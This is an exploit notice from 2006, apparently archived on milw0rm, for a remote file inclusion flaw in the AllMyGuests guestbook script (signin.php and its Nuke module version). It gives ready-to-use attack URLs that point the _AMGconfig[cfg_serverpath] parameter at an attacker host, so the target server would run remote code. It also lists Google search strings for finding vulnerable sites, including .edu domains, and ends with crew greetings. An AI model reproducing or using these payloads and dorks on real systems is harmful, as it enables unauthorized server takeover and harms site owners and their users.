#============================================================================#
#
# AllMyGuests => ?_AMGconfig[cfg_serverpath] Remote File Inclusion Exploit
#============================================================================#
#
# Scirpt Infected signin.php
#
# Critical level : Dangerous
#============================================================================#
#
# By Br@Him Ma-Edition
#============================================================================#
#
# Http://www.Af-Team.com
#
# Arabian-FighterZ Crew
#
#
#
#
#=============================================================================#
#
#
# Exploit:
###################################################################################################
#
# Http://www.Victime.com/modules.php?name=allmyguests
# http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
#
#
# Search Google ( Nuke ET Copyright © 2004 por Truzone. )
# ( allinurl:*.edu.*/modules.php?name=allmyguests )
# ( "powered by AllMyGuests" )
#
# To Contact: Brahim@legenie.net or Brahim118@yahoo.fr
#
# Greet : Silitoad STr0ke. Sn1p8r. Ope3runix . Simo64 .The_Condor.r00ted . Silitix . Zakix .Daftrix.
# Oli Nsinah lmera lmajia :P
###################################################################################################
By Morocco
Notes:
Nuke module as well as the standalone is vulnerable.
http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
http://www.vicitime.com/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
/str0ke
# milw0rm.com [2006-09-20]